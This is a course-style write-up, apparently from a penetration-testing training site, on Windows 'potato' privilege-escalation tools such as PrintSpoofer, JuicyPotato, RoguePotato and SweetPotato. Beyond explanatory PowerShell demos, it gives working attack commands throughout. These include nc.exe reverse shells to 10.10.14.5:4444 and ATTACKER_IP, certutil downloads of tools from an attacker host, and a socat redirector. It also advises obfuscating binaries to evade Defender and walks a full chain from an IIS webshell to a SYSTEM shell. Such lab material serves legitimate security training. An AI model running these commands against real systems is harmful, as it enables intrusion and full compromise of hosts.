Potato Attacks

intermediate · 40 min · Writeup

JuicyPotato, PrintSpoofer, and other potato attacks

Learning Objectives

  • Understand potato attack family
  • Use JuicyPotato
  • Use PrintSpoofer
  • Use newer potato variants

Potato attacks are a family of Windows privilege escalation techniques that abuse SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) to get SYSTEM access. They work by coercing a privileged Windows component (the DCOM/RPCSS activation service, the Print Spooler, and so on) into authenticating to a listener we control, such as a local named pipe or a fake RPC endpoint, and then impersonating the SYSTEM token that authentication hands us to spawn a new process.

Why "Potato"? The first technique was called "Hot Potato", and the name stuck. Now we have a whole garden: JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato, and more. Each uses a different trigger to make a SYSTEM process connect back to us, but all achieve the same goal: SYSTEM access from SeImpersonate.

Service Account Essential

Potato attacks require SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. These are granted by default to service accounts such as IIS application pool identities, the SQL Server service account and LOCAL SERVICE / NETWORK SERVICE, which is why a webshell or xp_cmdshell foothold so often leads here. Check with: whoami /priv (the privilege only has to be listed; a domain user's desktop session normally does not have it at all).
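The primitive every potato is built on, as an added example that is not part of this page and not code from any of the tools it describes: a named-pipe server impersonates whichever client connects to it. Here the client is this same PowerShell process, so it runs without any special privilege; in a real potato the client is spoolsv.exe, RPCSS or another SYSTEM process that was coerced into connecting. The pipe name and the one payload byte are arbitrary choices of this example.

```powershell
# Added example: ImpersonateNamedPipeClient via .NET, the core step of PrintSpoofer-style potatoes.
# Assumptions: Windows PowerShell 5.1 or PowerShell 7 on Windows; pipe name is arbitrary.

Add-Type -AssemblyName System.Core   # harmless if already loaded; holds System.IO.Pipes on 5.1

$pipeName = 'demo_potato_' + [guid]::NewGuid().ToString('N')   # assumption: any unused name

# Server side: CreateNamedPipe happens in the constructor
$server = New-Object System.IO.Pipes.NamedPipeServerStream(
    $pipeName,
    [System.IO.Pipes.PipeDirection]::InOut,
    1,                                               # a single instance
    [System.IO.Pipes.PipeTransmissionMode]::Byte)

# Client side: CreateFile on the pipe succeeds as soon as the instance exists,
# so it can connect before the server calls ConnectNamedPipe
$client = New-Object System.IO.Pipes.NamedPipeClientStream('.', $pipeName, [System.IO.Pipes.PipeDirection]::InOut)
$client.Connect(5000)
$client.WriteByte(0x41)   # ImpersonateNamedPipeClient fails unless the client has written something
$client.Flush()

$server.WaitForConnection()   # ConnectNamedPipe; returns at once, the client is already attached
$null = $server.ReadByte()    # consume the client's byte

$me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
Write-Host "server thread before impersonation: $($me.Name)"

# RunAsClient wraps ImpersonateNamedPipeClient / RevertToSelf around the delegate
$server.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    Write-Host "inside RunAsClient: $($id.Name), token level: $($id.ImpersonationLevel)"
    # A potato would now DuplicateTokenEx($id.Token) into a primary token and call
    # CreateProcessWithTokenW / CreateProcessAsUser with it to spawn cmd.exe as the client.
})

$client.Dispose()
$server.Dispose()
```

Because client and server are the same account here, Windows allows an Impersonation-level token even without SeImpersonatePrivilege. The privilege decides the outcome only when the client is a different, more privileged account such as SYSTEM, which is exactly the potato case: without it the kernel hands the server an Identification-level token, and creating a process with that token fails.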

The Potato Family

Potato Attack Evolution:
├── Hot Potato (2016)
│   ├── NBNS spoofing + WPAD abuse
│   └── Patched in MS16-075

├── Rotten Potato (2016)
│   ├── DCOM + NTLM reflection
│   └── Works on Win 7/8/10, Server 2008-2016

├── JuicyPotato (2018)
│   ├── Improved RottenPotato
│   ├── Works on Win 7/8/10 (before 1809), Server 2008-2016
│   ├── Needs valid CLSID
│   └── Most popular for older systems

├── RoguePotato (2020)
│   ├── For Windows 10 1809+, Server 2019
│   ├── Uses a remote OXID resolver listener
│   └── Bypasses the DCOM change that broke JuicyPotato

├── PrintSpoofer (2020)
│   ├── Abuses Print Spooler
│   ├── Works on Win 10/2016/2019
│   └── Very reliable, simple to use

├── SweetPotato (2020)
│   ├── Combines multiple techniques
│   └── Works on many versions

└── GodPotato (2022)
    ├── Works on Windows 8 through 11 and Server 2012 through 2022
    └── More reliable than predecessors

Which Potato to Use?

For Windows 10 1809+ and Server 2019+: PrintSpoofer if the Print Spooler is running (simplest), otherwise RoguePotato or GodPotato. For Windows 7/8, Windows 10 before 1809 and Server 2008-2016: JuicyPotato with a CLSID that is valid for that build. PrintSpoofer also works on Server 2016 and older Windows 10 builds, so try it first whenever the spooler is up.

PrintSpoofer

PrintSpoofer is the simplest and most reliable Potato attack for modern Windows systems. It abuses the Print Spooler service (spoolsv.exe, which runs as SYSTEM): the tool creates a named pipe, asks the spooler over RPC to send a printer change notification to that pipe, and when the spooler connects it calls ImpersonateNamedPipeClient and uses the resulting SYSTEM token to spawn the requested command.

batch
REM Requirements:
REM - SeImpersonatePrivilege (check: whoami /priv)
REM - Print Spooler service running (running by default on most installs;
REM   often disabled on hardened servers since PrintNightmare)

REM Check requirements
whoami /priv | findstr /i "SeImpersonate"
REM SeImpersonatePrivilege    Impersonate a client after authentication    Enabled

sc query spooler | findstr STATE
REM         STATE              : 4  RUNNING

REM Download PrintSpoofer
REM https://github.com/itm4n/PrintSpoofer/releases

REM Basic usage - spawn a SYSTEM cmd in the current console
REM (-i only helps from a real console; from a webshell there is nothing to
REM  interact with, so use -c with a reverse shell instead)
PrintSpoofer.exe -i -c cmd

REM Run a specific command (non-interactive: the output is not shown to you,
REM redirect it to a file if you need it)
PrintSpoofer.exe -c "whoami"

REM Reverse shell
PrintSpoofer.exe -c "C:\temp\nc.exe 10.10.14.5 4444 -e cmd"

REM Example session:
C:\inetpub\wwwroot> PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.1]
(c) 2018 Microsoft Corporation.

C:\Windows\system32> whoami
nt authority\system

Print Spooler Disabled

If the Print Spooler is disabled (commonly done after PrintNightmare, CVE-2021-34527, or by server hardening baselines), PrintSpoofer has nothing to coerce. Fall back to RoguePotato, SweetPotato or GodPotato, which do not depend on the spooler.

JuicyPotato

batch
REM JuicyPotato - works on Windows 7/8/10 (before 1809), Server 2008-2016
REM Does NOT work on Windows 10 1809+ or Server 2019: Microsoft changed the DCOM
REM OXID resolution it relies on (RoguePotato was written to get around that)

REM Requirements:
REM - SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
REM - A CLSID of an out-of-process COM server that runs as SYSTEM on the target OS

REM Download
REM https://github.com/ohpe/juicy-potato/releases

REM Flags: -l local port the fake COM server listens on (any free port),
REM        -p program to run, -a its arguments, -c CLSID (default is BITS),
REM        -t which API to use: t = CreateProcessWithTokenW (needs SeImpersonate),
REM           u = CreateProcessAsUser (needs SeAssignPrimaryToken), * = try both

REM Basic usage
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -t *

REM With specific CLSID (important!)
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -t * -c {CLSID}

REM Run reverse shell
JuicyPotato.exe -l 1337 -p C:\temp\shell.exe -t *

REM Run command and capture output (the spawned process has no console you can see,
REM so redirect to a file)
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\temp\whoami.txt" -t *

REM Common CLSIDs by OS (verify against the list for your exact build and edition;
REM a CLSID that works on one edition often fails on another):
REM Windows 10 Pro: {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
REM Windows 10 Enterprise: {3c6859ce-230b-48a4-be6c-932c0c202048}
REM Windows Server 2016: {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
REM Windows Server 2012: {8BC3F05E-D86B-11D0-A075-00C04FB68820}

REM Full CLSID list: https://github.com/ohpe/juicy-potato/tree/master/CLSID

Finding Valid CLSIDs

batch
REM If the default CLSID fails, find one that works

REM The juicy-potato repo ships CLSID\GetCLSID.ps1, which enumerates the COM classes
REM on this host together with the identity their AppID runs as, and test_clsid.bat,
REM which loops over the resulting list running JuicyPotato.exe against each entry
powershell -ep bypass -File .\GetCLSID.ps1

REM Test CLSIDs one by one
REM Look for ones that run as LocalService, LocalSystem or NetworkService
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\temp\out.txt" -t * -c {CLSID}

REM Or use the pre-compiled lists based on OS version
REM https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

RoguePotato

batch
REM RoguePotato - for Windows 10 1809+ and Server 2019
REM Bypasses the change that broke JuicyPotato: DCOM is told to use an OXID resolver
REM on an attacker host (port 135), and that host redirects the request straight back
REM to a fake resolver RoguePotato runs on the target

REM Requirements:
REM - SeImpersonatePrivilege
REM - A machine you control that the target can reach on TCP/135
REM   (RPCSS owns port 135 on the target itself, so the redirector cannot run there)

REM On attacker machine - redirect the OXID resolver request back to the target
socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999

REM On target - run RoguePotato (-r attacker IP, -l the port socat forwards to)
RoguePotato.exe -r ATTACKER_IP -e "cmd.exe /c whoami > C:\temp\out.txt" -l 9999

REM With reverse shell
RoguePotato.exe -r ATTACKER_IP -e "C:\temp\nc.exe ATTACKER 4444 -e cmd" -l 9999

REM If you cannot stand up the remote redirector (egress to port 135 blocked, no
REM second host), RoguePotato is not an option: use PrintSpoofer (spooler running)
REM or GodPotato instead

SweetPotato

batch
REM SweetPotato (CCob) - several potato techniques in one .NET binary
REM More reliable across different Windows versions

REM Download from:
REM https://github.com/CCob/SweetPotato

REM Basic usage - run a command
SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami"

REM Interactive shell
SweetPotato.exe -p cmd.exe

REM Reverse shell
SweetPotato.exe -p C:\temp\shell.exe

REM Techniques it can use (selected with -e; run SweetPotato.exe -h to see the
REM modes your build supports):
REM - DCOM (the RottenPotato/JuicyPotato method, needs a valid CLSID via -c)
REM - WinRM (BITS)
REM - EfsRpc
REM - PrintSpoofer
REM Automatically finds what works

Choosing the Right Potato

Decision Tree for Potato Selection:

1. Check Windows version:
   systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

2. Check privileges (findstr treats space-separated strings as alternatives;
   it has no "|" operator):
   whoami /priv | findstr /i "impersonate assign"

3. Choose attack:

   Windows 7, 8, 10 (pre-1809), Server 2008-2016:
   └── JuicyPotato (find valid CLSID)

   Windows 10 1809+, Server 2019+:
   ├── PrintSpoofer (if Print Spooler running)
   ├── RoguePotato (if you can redirect traffic through a host you control)
   ├── SweetPotato (tries multiple methods)
   └── GodPotato (newest, most compatible)

   Quick Check:
   sc query spooler
   ├── Running? → PrintSpoofer
   └── Stopped? → Try RoguePotato, SweetPotato or GodPotato
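The three checks above run as one script, as an added example written for this page (it is not part of any potato tool): it parses whoami /priv, reads the OS build, queries the Spooler service and prints the branch of the decision tree that applies. The 17763 build cut-off is Windows 10 1809 / Server 2019, where the DCOM trick JuicyPotato relies on stopped working; nothing in the script exploits anything, so it is safe to run on any host.

```powershell
# Added example: potato triage, one call, no exploitation.
# Assumptions: run from the foothold shell (cmd or PowerShell) as the low-privileged user.

function Get-PotatoTriage {
    # whoami /priv lists only privileges present in the token; "Disabled" still counts
    $priv = (& whoami /priv) -join "`n"
    $hasImpersonate = $priv -match 'SeImpersonatePrivilege'
    $hasAssign      = $priv -match 'SeAssignPrimaryTokenPrivilege'

    $os    = Get-CimInstance Win32_OperatingSystem
    $build = [int]$os.BuildNumber
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerRunning = [bool]($spooler -and $spooler.Status -eq 'Running')

    $advice = @()
    if (-not ($hasImpersonate -or $hasAssign)) {
        $advice += 'No SeImpersonate/SeAssignPrimaryToken: potato attacks will not work, look elsewhere'
    }
    else {
        if ($spoolerRunning) { $advice += 'PrintSpoofer (Print Spooler is running)' }
        if ($build -lt 17763) {
            $advice += 'JuicyPotato (pre-1809 build; pick a CLSID for this OS/edition)'
        }
        else {
            $advice += 'RoguePotato (needs a host you control reachable on TCP/135) or GodPotato'
            $advice += 'SweetPotato (auto-selects a method)'
        }
        if (-not $hasImpersonate) { $advice += 'Only SeAssignPrimaryToken: use JuicyPotato -t u' }
    }

    [pscustomobject]@{
        User                 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        OS                   = "$($os.Caption) build $build"
        SeImpersonate        = $hasImpersonate
        SeAssignPrimaryToken = $hasAssign
        SpoolerRunning       = $spoolerRunning
        Suggested            = $advice -join '; '
    }
}

Get-PotatoTriage | Format-List
```

From a webshell, invoke it as powershell -ep bypass -File triage.ps1 and read the Suggested line; when both PrintSpoofer and a 1809+ path are listed, PrintSpoofer is the one to try first because it needs no second host and no CLSID hunting.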

Complete Attack Example

batch
REM Scenario: IIS webshell on Windows Server 2019

REM 1. Check current user
whoami
REM iis apppool\defaultapppool

REM 2. Check privileges
whoami /priv
REM SeImpersonatePrivilege ... Enabled  <- GOOD!

REM 3. Check Windows version
systeminfo | findstr /B "OS"
REM OS Name: Microsoft Windows Server 2019
REM -> Server 2019 (build 17763+): JuicyPotato is out, use PrintSpoofer or a newer Potato

REM 4. Check Print Spooler
sc query spooler | findstr STATE
REM STATE: 4 RUNNING  <- GOOD!

REM 5. Upload PrintSpoofer to a directory the app pool can write to and execute from
REM    (Defender and most AV flag the public release binary, so expect to rebuild
REM     or obfuscate it)
certutil -urlcache -f http://10.10.14.5/PrintSpoofer.exe C:\temp\PrintSpoofer.exe

REM 6. Set up listener on attacker
nc -lvnp 4444

REM 7. Upload nc.exe
certutil -urlcache -f http://10.10.14.5/nc.exe C:\temp\nc.exe

REM 8. Run PrintSpoofer with reverse shell (no -i: there is no console behind a webshell;
REM    full paths, because the SYSTEM process inherits the webshell's working directory)
C:\temp\PrintSpoofer.exe -c "C:\temp\nc.exe 10.10.14.5 4444 -e cmd"

REM 9. On attacker - catch SYSTEM shell
REM C:\Windows\system32> whoami
REM nt authority\system

Potato Attack Methodology

Potato Attack Flow

1. Verify Priv: whoami /priv - must show SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege)
2. OS Version: systeminfo to determine Windows version and build
3. Choose Tool: PrintSpoofer, JuicyPotato, or others based on OS
4. Check Services: verify required services are running (Print Spooler for PrintSpoofer)
5. Transfer: upload chosen Potato tool and payload
6. Execute: run with reverse shell or command
7. SYSTEM: enjoy your SYSTEM shell!

Knowledge Check


What privilege is required for all Potato attacks?

Challenges

Potato Escalation

Challenge
🔥 intermediate

You have a shell as IIS AppPool on Windows Server 2016. Escalate to SYSTEM using the appropriate Potato attack.


Key Takeaways

  • Potato attacks turn SeImpersonatePrivilege into SYSTEM access
  • PrintSpoofer: Best for modern Windows with Print Spooler
  • JuicyPotato: For older Windows, needs valid CLSID
  • Service accounts (IIS, SQL) often have SeImpersonate
  • Always check OS version to choose correct tool
  • SweetPotato/GodPotato try multiple techniques automatically